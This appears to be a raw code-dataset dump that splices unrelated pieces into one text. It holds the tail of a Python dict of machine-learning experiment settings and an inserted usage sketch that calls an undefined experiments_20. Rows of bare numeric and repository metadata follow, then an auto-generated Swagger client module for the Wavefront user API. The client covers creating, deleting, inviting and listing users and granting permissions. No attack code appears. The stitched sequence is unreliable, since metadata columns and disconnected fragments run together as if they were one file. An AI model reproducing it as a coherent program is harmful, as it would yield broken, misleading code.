'load_prop_scores': True,
'save_prop_scores': False,
'balance_dataset': True,
'prop_scores_filename': 'balanced_KPI_STKE_EGFR_E3',
'random_seed': 0,
'normalization_method': 'power', # 'standard' / 'power'
'split_type': 'normal'}, # 'regular' / 'harsh'
'propagation':
{'alpha': 0.8,
'eps': 1e-6,
'n_iterations': 200},
'model':
{'feature_extractor_layers': [64, 32, 16],
'classifier_layers': [32, 16],
'pulling_func': 'mean',
'exp_emb_size': 12,
'feature_extractor_dropout': 0,
'classifier_dropout': 0,
'pair_degree_feature': 0,
},
'train':
{'intermediate_loss_weight': 0.95,
'intermediate_loss_type': 'BCE',
'focal_gamma': 1,
'train_val_test_split': [0.66, 0.14, 0.2], # sum([train, val, test])=1
'train_batch_size': 8,
'test_batch_size': 8,
'n_epochs': 2000,
'eval_interval': 2,
'learning_rate': 1e-3,
'max_evals_no_imp': 15,
}}
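# --- Hypothetical usage sketch (not part of the original file): shows how a
# consumer might read nested values out of the preset dicts above. The helper
# name get_preset_value is made up for illustration.
def get_preset_value(preset, section, key, default=None):
    """Fetch preset[section][key], falling back to default when absent."""
    return preset.get(section, {}).get(key, default)

if __name__ == '__main__':
    lr = get_preset_value(experiments_20, 'train', 'learning_rate')
    alpha = get_preset_value(experiments_20, 'propagation', 'alpha')
    print('experiments_20 learning rate:', lr, '| propagation alpha:', alpha)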
| 33.213018
| 80
| 0.544629
| 607
| 5,613
| 4.670511
| 0.186161
| 0.049383
| 0.033862
| 0.018342
| 0.923457
| 0.923457
| 0.914638
| 0.904409
| 0.904409
| 0.890653
| 0
| 0.051138
| 0.303225
| 5,613
| 168
| 81
| 33.410714
| 0.673741
| 0.044718
| 0
| 0.783951
| 0
| 0
| 0.482049
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d25d2e23823c9cf23a022ab84b1423425a077029
| 60,713
|
py
|
Python
|
wavefront_api_client/api/user_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 11
|
2016-05-30T17:16:45.000Z
|
2021-06-11T19:32:59.000Z
|
wavefront_api_client/api/user_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 25
|
2016-05-02T23:05:19.000Z
|
2020-11-18T22:43:20.000Z
|
wavefront_api_client/api/user_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 30
|
2016-04-29T17:17:11.000Z
|
2022-02-11T04:58:37.000Z
|
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class UserApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_user_to_user_groups(self, id, **kwargs): # noqa: E501
"""Adds specific groups to the user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_user_to_user_groups(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: The list of groups that should be added to the account
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_user_to_user_groups_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.add_user_to_user_groups_with_http_info(id, **kwargs) # noqa: E501
return data
def add_user_to_user_groups_with_http_info(self, id, **kwargs): # noqa: E501
"""Adds specific groups to the user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_user_to_user_groups_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: The list of groups that should be added to the account
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_user_to_user_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `add_user_to_user_groups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/addUserGroups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_user(self, **kwargs): # noqa: E501
"""Creates an user if the user doesn't already exist. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool send_email: Whether to send email notification to the user, if created. Default: false
:param UserToCreate body: Example Body: <pre>{ \"emailAddress\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] }</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_user_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_user_with_http_info(**kwargs) # noqa: E501
return data
def create_user_with_http_info(self, **kwargs): # noqa: E501
"""Creates an user if the user doesn't already exist. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool send_email: Whether to send email notification to the user, if created. Default: false
:param UserToCreate body: Example Body: <pre>{ \"emailAddress\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] }</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['send_email', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_user" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'send_email' in params:
query_params.append(('sendEmail', params['send_email'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_multiple_users(self, **kwargs): # noqa: E501
"""Deletes multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_multiple_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] body: identifiers of the users that should be deleted
:return: ResponseContainerListString
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_multiple_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.delete_multiple_users_with_http_info(**kwargs) # noqa: E501
return data
def delete_multiple_users_with_http_info(self, **kwargs): # noqa: E501
"""Deletes multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_multiple_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] body: identifiers of the users that should be deleted
:return: ResponseContainerListString
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_multiple_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/deleteUsers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerListString', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_user(self, id, **kwargs): # noqa: E501
"""Deletes a user or service account identified by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_user_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Deletes a user or service account identified by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_users(self, **kwargs): # noqa: E501
"""Get all users # noqa: E501
Returns all users # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[UserModel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_users_with_http_info(**kwargs) # noqa: E501
return data
def get_all_users_with_http_info(self, **kwargs): # noqa: E501
"""Get all users # noqa: E501
Returns all users # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[UserModel]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[UserModel]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user(self, id, **kwargs): # noqa: E501
"""Retrieves a user by identifier (email address) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_user_with_http_info(id, **kwargs) # noqa: E501
return data
def get_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieves a user by identifier (email address) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_business_functions(self, id, **kwargs): # noqa: E501
"""Returns business functions of a specific user or service account. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_business_functions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_business_functions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_user_business_functions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_user_business_functions_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns business functions of a specific user or service account. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_business_functions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_business_functions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_user_business_functions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/businessFunctions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def grant_permission_to_users(self, permission, **kwargs): # noqa: E501
"""Grants a specific permission to multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.grant_permission_to_users(permission, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str permission: Permission to grant to the users. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission (required)
:param list[str] body: List of users that should be granted the specified permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.grant_permission_to_users_with_http_info(permission, **kwargs) # noqa: E501
else:
(data) = self.grant_permission_to_users_with_http_info(permission, **kwargs) # noqa: E501
return data
def grant_permission_to_users_with_http_info(self, permission, **kwargs): # noqa: E501
"""Grants a specific permission to multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.grant_permission_to_users_with_http_info(permission, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str permission: Permission to grant to the users. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission (required)
:param list[str] body: List of users that should be granted the specified permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['permission', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method grant_permission_to_users" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'permission' is set
if self.api_client.client_side_validation and ('permission' not in params or
params['permission'] is None): # noqa: E501
raise ValueError("Missing the required parameter `permission` when calling `grant_permission_to_users`") # noqa: E501
collection_formats = {}
path_params = {}
if 'permission' in params:
path_params['permission'] = params['permission'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/grant/{permission}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def grant_user_permission(self, id, **kwargs): # noqa: E501
"""Grants a specific permission to user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.grant_user_permission(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param str group: Permission group to grant to the account. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.grant_user_permission_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.grant_user_permission_with_http_info(id, **kwargs) # noqa: E501
return data
def grant_user_permission_with_http_info(self, id, **kwargs): # noqa: E501
"""Grants a specific permission to user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.grant_user_permission_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param str group: Permission group to grant to the account. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'group'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method grant_user_permission" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `grant_user_permission`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'group' in params:
form_params.append(('group', params['group'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/grant', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def invite_users(self, **kwargs): # noqa: E501
"""Invite users with given user groups and permissions. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invite_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[UserToCreate] body: Example Body: <pre>[ { \"emailAddress\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] } ]</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.invite_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.invite_users_with_http_info(**kwargs) # noqa: E501
return data
def invite_users_with_http_info(self, **kwargs): # noqa: E501
"""Invite users with given user groups and permissions. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invite_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[UserToCreate] body: Example Body: <pre>[ { \"emailAddress\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] } ]</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method invite_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/invite', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_user_from_user_groups(self, id, **kwargs): # noqa: E501
"""Removes specific groups from the user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_user_from_user_groups(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: The list of groups that should be removed from the account
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_user_from_user_groups_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.remove_user_from_user_groups_with_http_info(id, **kwargs) # noqa: E501
return data
def remove_user_from_user_groups_with_http_info(self, id, **kwargs): # noqa: E501
"""Removes specific groups from the user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_user_from_user_groups_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: The list of groups that should be removed from the account
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_user_from_user_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `remove_user_from_user_groups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/removeUserGroups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
